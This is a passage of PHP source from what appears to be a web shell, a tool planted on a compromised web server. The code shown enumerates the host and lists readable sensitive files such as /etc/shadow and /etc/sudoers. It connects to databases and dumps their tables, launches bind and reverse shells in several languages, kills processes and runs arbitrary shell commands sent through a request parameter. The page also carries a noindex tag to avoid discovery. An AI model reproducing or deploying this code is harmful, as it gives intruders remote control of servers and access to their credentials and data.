1552 $s_result .= "<tr><td>drive ".$drive."</td><td>".ts(disk_free_space($drive))." free of ".ts(disk_total_space($drive))."</td></tr>";
1553 }
1554 }
1555 }
1556 else $s_result .= "<tr><td>root partition</td><td>".ts(disk_free_space("/"))." free of ".ts(disk_total_space("/"))."</td></tr>";
1557
1558 $s_result .= "<tr><td>php</td><td>".phpversion()."</td></tr>";
1559 if($s_python) $s_result .= "<tr><td>python</td><td>".exe("python -V")."</td></tr>";
1560 if($s_perl) $s_result .= "<tr><td>perl</td><td>".exe("perl -e \"print \$]\"")."</td></tr>";
1561 if($s_ruby) $s_result .= "<tr><td>ruby</td><td>".exe("ruby -v")."</td></tr>";
1562 if($s_gcc){
1563 $gcc_version = exe("gcc --version");
1564 $gcc_ver = explode("\n",$gcc_version);
1565 if(count($gcc_ver)>0) $gcc_ver = $gcc_ver[0];
1566 $s_result .= "<tr><td>gcc</td><td>".$gcc_ver."</td></tr>";
1567 }
1568 if($s_java) $s_result .= "<tr><td>java</td><td>".str_replace("\n", ", ", exe("java -version"))."</td></tr>";
1569
1570 $interesting = array(
1571 "/etc/passwd", "/etc/shadow", "/etc/group", "/etc/issue", "/etc/motd", "/etc/sudoers", "/etc/hosts", "/etc/aliases", "/etc/resolv.conf", "/etc/sysctl.conf",
1572 "/etc/named.conf", "/etc/network/interfaces", "/etc/squid/squid.conf", "/usr/local/squid/etc/squid.conf",
1573 "/etc/ssh/sshd_config",
1574 "/etc/httpd/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf"," /etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/pkg/etc/httpd/httpd.conf", "/usr/local/etc/apache22/httpd.conf", "/usr/local/etc/apache2/httpd.conf", "/var/www/conf/httpd.conf", "/etc/apache2/httpd2.conf", "/etc/httpd/httpd.conf",
1575 "/etc/lighttpd/lighttpd.conf", "/etc/nginx/nginx.conf",
1576 "/etc/fstab", "/etc/mtab", "/etc/crontab", "/etc/inittab", "/etc/modules.conf", "/etc/modules");
1577 foreach($interesting as $f){
1578 if(is_file($f) && is_readable($f))
1579 $s_result .= "<tr><td>".$f."</td><td><a href='".$s_self."view=".$f."'>".$f." is readable</a></td></tr>";
1580 }
1581
1582
1583 $s_result .= "</table></div>";
1584
1585 if(!$s_win){
1586 // cpu info
1587 if($i_buff=trim(@file_get_contents("/proc/cpuinfo"))){
1588 $s_result .= "<p class='notif' onclick=\"toggle('info_cpu')\">CPU Info</p>";
1589 $s_result .= "<div class='info' id='info_cpu'>";
1590 $i_buffs = explode("\n\n", $i_buff);
1591 foreach($i_buffs as $i_buffss){
1592 $i_buffss = trim($i_buffss);
1593 if($i_buffss!=""){
1594 $i_buffsss = explode("\n",$i_buffss);
1595 $s_result .= "<table>";
1596 foreach($i_buffsss as $i){
1597 $i = trim($i);
1598 if($i!=""){
1599 $ii = explode(":",$i);
1600 if(count($ii)==2) $s_result .= "<tr><td>".$ii[0]."</td><td>".$ii[1]."</td></tr>";
1601 }
1602 }
1603 $s_result .= "</table>";
1604 }
1605 }
1606 $s_result .= "</div>";
1607 }
1608 // mem info
1609 if($i_buff=trim(@file_get_contents("/proc/meminfo"))){
1610 $s_result .= "<p class='notif' onclick=\"toggle('info_mem')\">Memory Info</p>";
1611 $i_buffs = explode("\n",$i_buff);
1612 $s_result .= "<div class='info' id='info_mem'><table>";
1613 foreach($i_buffs as $i){
1614 $i = trim($i);
1615 if($i!=""){
1616 $ii = explode(":",$i);
1617 if(count($ii)==2) $s_result .= "<tr><td>".$ii[0]."</td><td>".$ii[1]."</td></tr>";
1618 }
1619 else $s_result .= "</table><table>";
1620 }
1621 $s_result .= "</table></div>";
1622 }
1623 // partition
1624 if($i_buff=trim(@file_get_contents("/proc/partitions"))){
1625 $i_buff = preg_replace("/\ +/"," ",$i_buff);
1626 $s_result .= "<p class='notif' onclick=\"toggle('info_part')\">Partitions Info</p>";
1627 $s_result .= "<div class='info' id='info_part'>";
1628 $i_buffs = explode("\n\n", $i_buff);
1629 $s_result .= "<table><tr>";
1630 $i_head = explode(" ",$i_buffs[0]);
1631 foreach($i_head as $h) $s_result .= "<th>".$h."</th>";
1632 $s_result .= "</tr>";
1633 $i_buffss = explode("\n", $i_buffs[1]);
1634 foreach($i_buffss as $i_b){
1635 $i_row = explode(" ",trim($i_b));
1636 $s_result .= "<tr>";
1637 foreach($i_row as $r) $s_result .= "<td style='text-align:center;'>".$r."</td>";
1638 $s_result .= "</tr>";
1639 }
1640 $s_result .= "</table>";
1641 $s_result .= "</div>";
1642 }
1643 }
1644 $phpinfo = array(
1645 "PHP General" => INFO_GENERAL,
1646 "PHP Configuration" => INFO_CONFIGURATION,
1647 "PHP Modules" => INFO_MODULES,
1648 "PHP Environment" => INFO_ENVIRONMENT,
1649 "PHP Variables" => INFO_VARIABLES
1650 );
1651 foreach($phpinfo as $p=>$i){
1652 $s_result .= "<p class='notif' onclick=\"toggle('".$i."')\">".$p."</p>";
1653 ob_start();
1654 eval("phpinfo(".$i.");");
1655 $b = ob_get_contents();
1656 ob_end_clean();
1657 $a = strpos($b,"<body>")+6;
1658 $z = strpos($b,"</body>");
1659 $body = substr($b,$a,$z-$a);
1660 $body = str_replace(",",", ",$body);
1661 $body = str_replace("&","&",$body);
1662 $body = str_replace(";","; ",$body);
1663 $s_result .= "<div class='info' id='".$i."'>".$body."</div>";
1664 }
1665 } // working with database
1666 elseif(isset($_REQUEST['db'])){
1667 // sqltype : mysql, mssql, oracle, pgsql, odbc, pdo
1668 $sqlhost = isset($_REQUEST['sqlhost'])? ssc($_REQUEST['sqlhost']) : "";
1669 $sqlport = isset($_REQUEST['sqlport'])? ssc($_REQUEST['sqlport']) : "";
1670 $sqluser = isset($_REQUEST['sqluser'])? ssc($_REQUEST['sqluser']) : "";
1671 $sqlpass = isset($_REQUEST['sqlpass'])? ssc($_REQUEST['sqlpass']) : "";
1672 $sqltype = isset($_REQUEST['sqltype'])? ssc($_REQUEST['sqltype']) : "";
1673 $show_form = true;
1674 $show_dbs = true;
1675
1676 if(isset($_REQUEST['connect'])){
1677 $con = sql_connect($sqltype,$sqlhost,$sqluser,$sqlpass);
1678 $sqlcode = isset($_REQUEST['sqlcode']) ? ssc($_REQUEST['sqlcode']) : "";
1679
1680 if($con!==false){
1681 $show_form = false;
1682 $s_result .= "<form action='".$s_self."db' method='post'>
1683 <input type='hidden' name='sqlhost' value='".$sqlhost."' />
1684 <input type='hidden' name='sqlport' value='".$sqlport."' />
1685 <input type='hidden' name='sqluser' value='".$sqluser."' />
1686 <input type='hidden' name='sqlpass' value='".$sqlpass."' />
1687 <input type='hidden' name='sqltype' value='".$sqltype."' />
1688 <input type='hidden' name='connect' value='connect' />
1689 <textarea id='sqlcode' name='sqlcode' class='txtarea' style='height:150px;'>".$sqlcode."</textarea>
1690 <p><input type='submit' name='gogo' class='inputzbut' value='Go !' style='width:120px;height:30px;' />
1691 Separate multiple commands with a semicolon <span class='gaya'>[</span> ; <span class='gaya'>]</span></p>
1692 </form>";
1693
1694 if(!empty($sqlcode)){
1695 $querys = explode(";",$sqlcode);
1696 foreach($querys as $query){
1697 if(trim($query) != ""){
1698 $hasil = sql_query($sqltype,$query,$con);
1699 if($hasil!=false){
1700 $s_result .= "<p style='padding:0;margin:6px 10px;font-weight:bold;'>".$query.";
1701 <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>
1702 <table class='explore sortable' style='width:100%;'><tr>";
1703 for($i=0;$i<sql_num_fields($sqltype,$hasil);$i++)
1704 $s_result .= "<th>".@hss(sql_field_name($sqltype,$hasil,$i))."</th>";
1705 $s_result .= "</tr>";
1706 while($rows=sql_fetch_data($sqltype,$hasil)){
1707 $s_result .= "<tr>";
1708 foreach($rows as $r){
1709 if(empty($r)) $r = " ";
1710 $s_result .= "<td>".@hss($r)."</td>";
1711 }
1712 $s_result .= "</tr>";
1713 }
1714 $s_result .= "</table>";
1715 }
1716 else{
1717 $s_result .= "<p style='padding:0;margin:6px 10px;font-weight:bold;'>".$query.";
1718 <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";
1719 }
1720 }
1721 }
1722 }
1723 else{
1724 if(($sqltype!='pdo') && ($sqltype!='odbc')){
1725 if($sqltype=='mysql') $showdb = "SHOW DATABASES";
1726 elseif($sqltype=='mssql') $showdb = "SELECT name FROM master..sysdatabases";
1727 elseif($sqltype=='pgsql') $showdb = "SELECT schema_name FROM information_schema.schemata";
1728 elseif($sqltype=='oracle') $showdb = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME";
1729 elseif($sqltype=='sqlite3' || $sqltype=='sqlite') $showdb = "SELECT \"".$sqlhost."\"";
1730 else $showdb = "SHOW DATABASES";
1731
1732 $hasil = sql_query($sqltype,$showdb,$con);
1733
1734 if($hasil!=false) {
1735 while($rows_arr=sql_fetch_data($sqltype,$hasil)){
1736 foreach($rows_arr as $rows){
1737 $s_result .= "<p class='notif' onclick=\"toggle('db_".$rows."')\">".$rows."</p>";
1738 $s_result .= "<div class='info' id='db_".$rows."'><table class='explore'>";
1739
1740 if($sqltype=='mysql') $showtbl = "SHOW TABLES FROM ".$rows;
1741 elseif($sqltype=='mssql') $showtbl = "SELECT name FROM ".$rows."..sysobjects WHERE xtype = 'U'";
1742 elseif($sqltype=='pgsql') $showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema='".$rows."'";
1743 elseif($sqltype=='oracle') $showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='".$rows."'";
1744 elseif($sqltype=='sqlite3' || $sqltype=='sqlite') $showtbl = "SELECT name FROM sqlite_master WHERE type='table'";
1745 else $showtbl = "";
1746
1747 $hasil_t = sql_query($sqltype,$showtbl,$con);
1748 if($hasil_t!=false) {
1749 while($tables_arr=sql_fetch_data($sqltype,$hasil_t)){
1750 foreach($tables_arr as $tables){
1751 if($sqltype=='mysql') $dump_tbl = "SELECT * FROM ".$rows.".".$tables." LIMIT 0,100";
1752 elseif($sqltype=='mssql') $dump_tbl = "SELECT TOP 100 * FROM ".$rows."..".$tables;
1753 elseif($sqltype=='pgsql') $dump_tbl = "SELECT * FROM ".$rows.".".$tables." LIMIT 100 OFFSET 0";
1754 elseif($sqltype=='oracle') $dump_tbl = "SELECT * FROM ".$rows.".".$tables." WHERE ROWNUM BETWEEN 0 AND 100;";
1755 elseif($sqltype=='sqlite' || $sqltype=='sqlite3') $dump_tbl = "SELECT * FROM ".$tables." LIMIT 0,100";
1756 else $dump_tbl = "";
1757
1758 $dump_tbl_link = $s_self."db&connect=&sqlhost=".$sqlhost."&sqlport=".$sqlport."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqltype=".$sqltype."&sqlcode=".urlencode($dump_tbl);
1759
1760 $s_result .= "<tr><td onmouseup=\"return go('".addslashes($dump_tbl_link)."',event);\"><a target='_blank' href='".$dump_tbl_link."'>".$tables."</a></td></tr>";
1761 }
1762 }
1763 }
1764 $s_result .= "</table></div>";
1765 }
1766 }
1767 }
1768 }
1769 }
1770 sql_close($sqltype,$con);
1771 }
1772 else{
1773 $s_result .= "<p class='notif'>Unable to connect to database</p>";
1774 $show_form = true;
1775 }
1776 }
1777
1778 if($show_form){
1779 // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
1780 $sqllist = array();
1781 if(function_exists("mysql_connect")) $sqllist["mysql"] = "connect to MySQL <span style=\"font-size:12px;color:#999;\">- using mysql_*</span>";
1782 if(function_exists("mssql_connect") || function_exists("sqlsrv_connect")) $sqllist["mssql"] = "connect to MsSQL <span style=\"font-size:12px;color:#999;\">- using mssql_* or sqlsrv_*</span>";
1783 if(function_exists("pg_connect")) $sqllist["pgsql"] = "connect to PostgreSQL <span style=\"font-size:12px;color:#999;\">- using pg_*</span>";
1784 if(function_exists("oci_connect")) $sqllist["oracle"] = "connect to oracle <span style=\"font-size:12px;color:#999;\">- using oci_*</span>";
1785 if(function_exists("sqlite_open")) $sqllist["sqlite"] = "connect to SQLite <span style=\"font-size:12px;color:#999;\">- using sqlite_*</span>";
1786 if(class_exists("SQLite3")) $sqllist["sqlite3"] = "connect to SQLite3 <span style=\"font-size:12px;color:#999;\">- using class SQLite3</span>";
1787 if(function_exists("odbc_connect")) $sqllist["odbc"] = "connect via ODBC <span style=\"font-size:12px;color:#999;\">- using odbc_*</span>";
1788 if(class_exists("PDO")) $sqllist["pdo"] = "connect via PDO <span style=\"font-size:12px;color:#999;\">- using class PDO</span>";
1789
1790 foreach($sqllist as $sqltype=>$sqltitle){
1791 if($sqltype=="odbc" || $sqltype=="pdo"){
1792 $s_result .= "<div class='mybox'><h2>".$sqltitle."</h2>
1793 <form action='".$s_self."db' method='post' />
1794 <table class='myboxtbl'>
1795 <tr><td style='width:170px;'>DSN / Connection String</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
1796 <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>
1797 <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>
1798 </table>
1799 <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
1800 <input type='hidden' name='sqltype' value='".$sqltype."' />
1801 </form>
1802 </div>";
1803 }
1804 elseif($sqltype=="sqlite" || $sqltype=="sqlite3"){
1805 $s_result .= "<div class='mybox'><h2>".$sqltitle."</h2>
1806 <form action='".$s_self."db' method='post' />
1807 <table class='myboxtbl'>
1808 <tr><td style='width:170px;'>DB File</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
1809 </table>
1810 <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
1811 <input type='hidden' name='sqltype' value='".$sqltype."' />
1812 </form>
1813 </div>";
1814 }
1815 else{
1816 $s_result .= "<div class='mybox'><h2>".$sqltitle."</h2>
1817 <form action='".$s_self."db' method='post' />
1818 <table class='myboxtbl'>
1819 <tr><td style='width:170px;'>Host</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
1820 <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>
1821 <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>
1822 <tr><td>Port (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='sqlport' value='' /></td></tr>
1823 </table>
1824 <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
1825 <input type='hidden' name='sqltype' value='".$sqltype."' />
1826 </form>
1827 </div>";
1828 }
1829 }
1830
1831 }
1832 } // bind and reverse shell
1833 elseif(isset($_REQUEST['rs'])){
1834 //$s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
1835 //$s_my_ip = $_SERVER['REMOTE_ADDR'];
1836 $rshost = $s_server_ip;
1837
1838 $rsport = "13123";
1839 // resources $rs_pl $rs_py $rs_rb $rs_c $rs_win
1840 $rspesana = "Press ' Go ! ' button and run ' nc <i>server_ip</i> <i>port</i> ' on your computer";
1841 $rspesanb = "Run ' nc -l -v -p <i>port</i> ' on your computer and press ' Go ! ' button";
1842
1843 //bind_pl bind_py bind_rb bind_c bind_win bind_php back_pl back_py back_rb back_c back_win back_php
1844 // resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php
1845 $rsbind = array();
1846 $rsback = array();
1847
1848
1849 $rsbind["bind_php"] = "Bind Shell <span style='font-size:12px;color:#999;'>- php</span>";
1850 $rsback["back_php"] = "Reverse Shell <span style='font-size:12px;color:#999;'>- php</span>";
1851
1852 if($s_perl){
1853 $rsbind["bind_pl"] = "Bind Shell <span style='font-size:12px;color:#999;'>- perl</span>";
1854 $rsback["back_pl"] = "Reverse Shell <span style='font-size:12px;color:#999;'>- perl</span>";
1855 }
1856 if($s_python){
1857 $rsbind["bind_py"] = "Bind Shell <span style='font-size:12px;color:#999;'>- python</span>";
1858 $rsback["back_py"] = "Reverse Shell <span style='font-size:12px;color:#999;'>- python</span>";
1859 }
1860 if($s_ruby){
1861 $rsbind["bind_rb"] = "Bind Shell <span style='font-size:12px;color:#999;'>- ruby</span>";
1862 $rsback["back_rb"] = "Reverse Shell <span style='font-size:12px;color:#999;'>- ruby</span>";
1863 }
1864 if($s_win){
1865 $rsbind["bind_win"] = "Bind Shell <span style='font-size:12px;color:#999;'>- windows executable</span>";
1866 $rsback["back_win"] = "Reverse Shell <span style='font-size:12px;color:#999;'>- windows executable</span>";
1867 }
1868 else{
1869 $rsbind["bind_c"] = "Bind Shell <span style='font-size:12px;color:#999;'>- c</span>";
1870 $rsback["back_c"] = "Reverse Shell <span style='font-size:12px;color:#999;'>- c</span>";
1871 }
1872
1873 $rslist = array_merge($rsbind,$rsback);
1874
1875 if(!is_writable($cwd)) $s_result .= "<p class='notif'>Directory ".$cwd." is not writable, please change to a writable one</p>";
1876 $rs_err = "";
1877 foreach($rslist as $rstype=>$rstitle){
1878 $split = explode("_",$rstype);
1879 if($split[0]=="bind"){
1880 $rspesan = $rspesana;
1881 $rsdisabled = "disabled='disabled'";
1882 $rstarget = $s_server_ip;
1883 $labelip = "Server IP";
1884 }
1885 elseif($split[0]=="back"){
1886 $rspesan = $rspesanb;
1887 $rsdisabled = "";
1888 $rstarget = $s_my_ip;
1889 $labelip = "Target IP";
1890 }
1891 if(isset($_REQUEST[$rstype])){
1892 if(isset($_REQUEST["rshost_".$rstype])) $rshost_ = ss($_REQUEST["rshost_".$rstype]);
1893 if(isset($_REQUEST["rsport_".$rstype])) $rsport_ = ss($_REQUEST["rsport_".$rstype]);
1894
1895 if($split[0]=="bind") $rstarget_packed = $rsport_;
1896 elseif($split[0]=="back") $rstarget_packed = $rsport_." ".$rshost_;
1897
1898 if($split[1]=="pl") $rscode = $rs_pl;
1899 elseif($split[1]=="py") $rscode = $rs_py;
1900 elseif($split[1]=="rb") $rscode = $rs_rb;
1901 elseif($split[1]=="c") $rscode = $rs_c;
1902 elseif($split[1]=="win") $rscode = $rs_win;
1903 elseif($split[1]=="php") $rscode = $rs_php;;
1904 $buff = rs($rstype,$rstarget_packed,$rscode);
1905 if($buff!="") $rs_err = "<p class='notif'>".hss($buff)."</p>";
1906 }
1907 $s_result .= "<div class='mybox'><h2>".$rstitle."</h2>
1908 <form action='".$s_self."rs' method='post' />
1909 <table class='myboxtbl'>
1910 <tr><td style='width:100px;'>".$labelip."</td><td><input ".$rsdisabled." style='width:100%;' class='inputz' type='text' name='rshost_".$rstype."' value='".$rstarget."' /></td></tr>
1911 <tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='rsport_".$rstype."' value='".$rsport."' /></td></tr>
1912 </table>
1913 <input type='submit' name='".$rstype."' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
1914 <span>".$rspesan."</span>
1915 </form>
1916 </div>";
1917 }
1918 $s_result = $rs_err.$s_result;
1919 } // task manager
1920 elseif(isset($_REQUEST['ps'])){
1921 $buff = "";
1922 // kill process specified by pid
1923 if(isset($_REQUEST['pid'])){
1924 $p = ss($_REQUEST['pid']);
1925 if(function_exists("posix_kill")) $buff = (posix_kill($p,'9'))? "Process with pid ".$p." has been successfully killed":"Unable to kill process with pid ".$p;
1926 else{
1927 if(!$s_win) $buff = exe("kill -9 ".$p);
1928 else $buff = exe("taskkill /F /PID ".$p);
1929 }
1930 }
1931
1932 if(!$s_win) $h = "ps aux";
1933 else $h = "tasklist /V /FO csv";
1934 $wcount = 11;
1935 $wexplode = " ";
1936 if($s_win) $wexplode = "\",\"";
1937
1938 $res = exe($h);
1939 if(trim($res)=='') $s_result = "<p class='notif'>Error getting process list</p>";
1940 else{
1941 if($buff!="") $s_result = "<p class='notif'>".$buff."</p>";
1942 $s_result .= "<table class='explore sortable'>";
1943 if(!$s_win) $res = preg_replace('#\ +#',' ',$res);
1944
1945 $psarr = explode("\n",$res);
1946 $fi = true;
1947 $tblcount = 0;
1948
1949 $check = explode($wexplode,$psarr[0]);
1950 $wcount = count($check);
1951
1952 foreach($psarr as $psa){
1953 if(trim($psa)!=''){
1954 if($fi){
1955 $fi = false;
1956 $psln = explode($wexplode,$psa,$wcount);
1957 $s_result .= "<tr><th class='sorttable_nosort'>action</th>";
1958 foreach($psln as $p) $s_result .= "<th>".trim(trim(strtolower($p)),"\"")."</th>";
1959 $s_result .= "</tr>";
1960 }
1961 else{
1962 $psln = explode($wexplode,$psa,$wcount);
1963 $s_result .= "<tr>";
1964 $tblcount = 0;
1965 foreach($psln as $p){
1966 if(trim($p)=="") $p = " ";
1967 if($tblcount == 0){
1968 $s_result .= "<td style='text-align:center;'><a href='".$s_self."ps&pid=".trim(trim($psln[1]),"\"")."'>kill</a></td>
1969 <td style='text-align:center;'>".trim(trim($p),"\"")."</td>";
1970 $tblcount++;
1971 }
1972 else{
1973 $tblcount++;
1974 if($tblcount == count($psln)) $s_result .= "<td style='text-align:left;'>".trim(trim($p),"\"")."</td>";
1975 else $s_result .= "<td style='text-align:center;'>".trim(trim($p),"\"")."</td>";
1976 }
1977 }
1978 $s_result .= "</tr>";
1979 }
1980 }
1981 }
1982 $s_result .= "</table>";
1983 }
1984 }
1985 else{
1986 if(isset($_REQUEST['cmd'])){
1987 $cmd = ss($_REQUEST['cmd']);
1988 if(strlen($cmd) > 0){
1989 if(preg_match('#^cd(\ )+(.*)$#',$cmd,$r)){
1990 $nd = trim($r[2]);
1991 if(is_dir($nd)){
1992 chdir($nd);
1993 $cwd = cp(getcwd());
1994 $s_result .= showdir($cwd);
1995 }
1996 elseif(is_dir($cwd.$nd)){
1997 chdir($cwd.$nd);
1998 $cwd = cp(getcwd());
1999 $s_result .= showdir($cwd);
2000 }
2001 else $s_result .= "<p class='notif'>".$nd." is not a directory"."</p>";
2002 }
2003 else{
2004 $s_r = hss(exe($cmd));
2005 if($s_r != '') $s_result .= "<pre>".$s_r."</pre>";
2006 else $s_result .= showdir($cwd);
2007 }
2008 }
2009 else $s_result .= showdir($cwd);
2010 }
2011 else{
2012 $s_result .= showdir($cwd);
2013 }
2014 }
2015
2016 // print useful info
2017 $s_info = "<table class='headtbl'><tr><td>".$s_system."</td></tr>";
2018 $s_info .= "<tr><td>".$s_software."</td></tr>";
2019 $s_info .= "<tr><td>server ip : ".$s_server_ip."<span class='gaya'> | </span>your ip : ".$s_my_ip;
2020 $s_info .= "<span class='gaya'> | </span> Time @ Server : ".@date("d M Y H:i:s",time());
2021 $s_info .= "
2022 </td></tr>
2023 <tr><td style='text-align:left;'>
2024 <table class='headtbls'><tr>
2025 <td>".trim($letters)."</td>
2026 <td>
2027 <span id='chpwd'>
2028 <a href=\"javascript:tukar('chpwd','chpwdform')\">
2029 <img height='16px' width='16px' src='".$s_self."favicon' alt='Change' style='vertical-align:middle;margin:6px 0;border:0;' />
2030 </a>".swd($cwd)."</span>
2031 <form action='".$s_self."' method='post' style='margin:0;padding:0;'>
2032 <span class='sembunyi' id='chpwdform'>
2033 <a href=\"javascript:tukar('chpwdform','chpwd');\">
2034 <img height='16px' width='16px' src='".$s_self."favicon' alt='Change' style='vertical-align:middle;margin:6px 0;border:0;' />
2035 </a>
2036 <input type='hidden' name='cd' class='inputz' style='width:300px;' value='".cp($cwd)."' />
2037 <input type='text' name='view' class='inputz' style='width:300px;' value='".$cwd."' />
2038 <input class='inputzbut' type='submit' name='submit' value='view file / folder' />
2039 </form>
2040 </span>
2041 </td></tr>
2042 </table>
2043 </td></tr>
2044 </table>";
2045
2046
2047
2048}
2049
2050?><!DOCTYPE html>
2051<html>
2052<head>
2053<title><?php echo $s_title; ?></title>
2054<meta name='robots' content='noindex, nofollow, noarchive'>
2055<link rel='SHORTCUT ICON' href='<?php echo $s_self; ?>favicon'>
2056<link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono' rel='stylesheet' type='text/css'>
2057<style type='text/css'><?php echo gzinflate(base64_decode($style)); ?></style>
2058<script type='text/javascript' src='<?php echo $s_self; ?>sorttable'></script>
2059<script type='text/javascript'>
2060var d = document;
2061var hexstatus = false;
2062window.onload=function(){
2063 init();
2064 var textareas = d.getElementsByTagName('textarea');
2065 var count = textareas.length;
2066 for(i=0;i<count;i++){
2067 textareas[i].onkeydown = function(e){
2068 if(e.keyCode==9){
2069 e.preventDefault();
2070 var s = this.selectionStart;
2071 this.value = this.value.substring(0,this.selectionStart) + "\t" + this.value.substring(this.selectionEnd);
2072 this.selectionEnd = s+1;
2073 }
2074 else if((e.keyCode == 10 || e.keyCode == 13) && event.ctrlKey){
2075 this.form.submit();
2076 }
2077 }
2078 }
2079}
2080function init(){
2081 <?php if(isset($_REQUEST['cmd'])) echo "if(d.getElementById('cmd')) d.getElementById('cmd').focus();"; ?>
2082 <?php if(isset($_REQUEST['evalcode'])) echo "if(d.getElementById('evalcode')) d.getElementById('evalcode').focus();"; ?>
2083 <?php if(isset($_REQUEST['sqlcode'])) echo "if(d.getElementById('sqlcode')) d.getElementById('sqlcode').focus();"; ?>
2084 <?php if(isset($_REQUEST['login'])) echo "if(d.getElementById('login')) d.getElementById('login').focus();"; ?>
2085}
2086function tukar(l,b){
2087 if(d.getElementById(l)) d.getElementById(l).style.display = 'none';
2088 if(d.getElementById(b)) d.getElementById(b).style.display = 'block';
2089 if(d.getElementById(l + '_')) d.getElementById(l + '_').focus();
2090}
2091function toggle(b){
2092 if(d.getElementById(b)){
2093 if(d.getElementById(b).style.display == 'block') d.getElementById(b).style.display = 'none';
2094 else d.getElementById(b).style.display = 'block'
2095 }
2096}
2097function clickcmd(){
2098 var buff = d.getElementById('cmd');
2099 if(buff.value == '- shell command -') buff.value = '';
2100}
2101function download(what){
2102 what.form.submit();
2103 what.selectedIndex=0;
2104}
2105function go(t,evt){
2106 if(evt.which === 3 || evt.button === 2) return false;
2107 var u = (d.all) ? d.selection.createRange().text : d.getSelection();
2108 if(u && u.toString().length==0) window.location=t;
2109 return false;
2110}
2111function hexfix(t,ev){
2112 var r = d.getElementById('hex_'+t);
2113 var q = d.getElementById('dump_'+t);
2114 var curpos = getcurpos(r);
2115
2116 if(ev.keyCode==13 || ev.keyCode==46 || ev.keyCode==8 || ev.keyCode==32) return false;
2117 //down
2118 if(ev.keyCode==40){
2119 var s = d.getElementById('hex_'+(parseInt(t)+1));
2120 if(s){clearpos();s.focus();setcurpos(s,curpos,curpos);}
2121 return false;
2122 }//up
2123 if(ev.keyCode==38){
2124 var s = d.getElementById('hex_'+(parseInt(t)-1));
2125 if(s){clearpos();s.focus();setcurpos(s,curpos,curpos);}
2126 return false;
2127 }
2128}
2129function hexupdate(t,ev){
2130 var r = d.getElementById('hex_'+t);
2131 var s = d.getElementById('dump_'+t);
2132 var k = String.fromCharCode(ev.keyCode);
2133 var a = '0123456789ABCDEF';
2134 var hexs = r.value;
2135 var hex = hexs.replace(/\s+/ig,'');
2136 var curpos = getcurpos(r);
2137
2138 clearpos();
2139 if(curpos%3!=2){
2140 if(a.indexOf(k)>=0 && curpos<hexs.length){
2141 chr = hexs.substr(curpos,1);
2142 before = (curpos>=1)? hexs.substr(0,curpos):'';
2143 after = (curpos<hexs.length)? hexs.substr(curpos+1):'';
2144 r.value = before + k + after;
2145 setcurpos(r,curpos+1,curpos+1);
2146 }
2147 }
2148
2149 if(r && s){
2150 var str = '';
2151 hexs = r.value;
2152 hex = hexs.replace(/\s+/ig,'');
2153 for(var i=0;i<hex.length;i+=2) str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
2154
2155 str = str.replace(/[^\x21-\x7E]/ig,'.');
2156 str = str.replace('<','<')
2157 str = str.replace('>','>')
2158
2159 dmppos = Math.floor(curpos/3);
2160 chr = str.substr(dmppos,1);
2161 before = (dmppos>=1)? str.substr(0,dmppos):'';
2162 after = (dmppos<str.length)? str.substr(dmppos+1):'';
2163 finalstr = before + "<span class='gaya' style='background:#000;font-weight:bold;border-bottom:1px solid #fff;border-top:1px solid #fff;'>" + chr + "</span>" + after;
2164 s.innerHTML = finalstr;
2165 }
2166}
2167function submithex(){
2168 if(!hexstatus){
2169 hexstatus=true;
2170 var hexstr = '';
2171 var counter = d.getElementById('counter').value;
2172 for(var i=0;i<counter;i++){
2173 var hex = d.getElementById('hex_'+i);
2174 hexstr+=hex.value;
2175 hex.remove();
2176 }
2177 hexstr = hexstr.replace(/\s+/g,'');
2178 var hexestxtarea = d.getElementById('hexestxtarea');
2179 hexestxtarea.innerHTML = hexstr;
2180 hexestxtarea.form.submit();
2181 }
2182}
2183function evalselect(e){
2184 var a = d.getElementById('additionaloption');
2185 var b = d.getElementById('gccoption');
2186 if(a){
2187 if(e.value=='php') a.className='sembunyi';
2188 else a.className='';
2189 if(b) gccoption.value ='';
2190 }
2191}
2192function getcurpos(c){
2193 var p = 0;
2194 if(d.selection){
2195 c.focus ();
2196 var Sel = d.selection.createRange();
2197 Sel.moveStart ('character', -c.value.length);
2198 p = Sel.text.length;
2199 }
2200 else if(c.selectionStart || c.selectionStart == '0')
2201 p = c.selectionStart;
2202 return p;
2203}
2204function setcurpos(c,p1,p2){
2205 if(c.setSelectionRange){
2206 c.focus();
2207 c.setSelectionRange(p1,p2);
2208 }
2209 else if(c.createTextRange){
2210 var r = c.createTextRange();
2211 r.collapse(true);
2212 r.moveStart('character', p1);
2213 r.moveEnd('character', p2);
2214 r.select();
2215 }
2216}
2217function clearpos(){
2218 var a = d.getElementsByName('hexdump');
2219 for(var i=0;i<a.length;i++){
2220 a[i].innerHTML = a[i].innerHTML.replace(/<[^>]+>/ig,'');
2221 }
2222}
2223function findtype(ty){
2224 var z = d.getElementById('type');
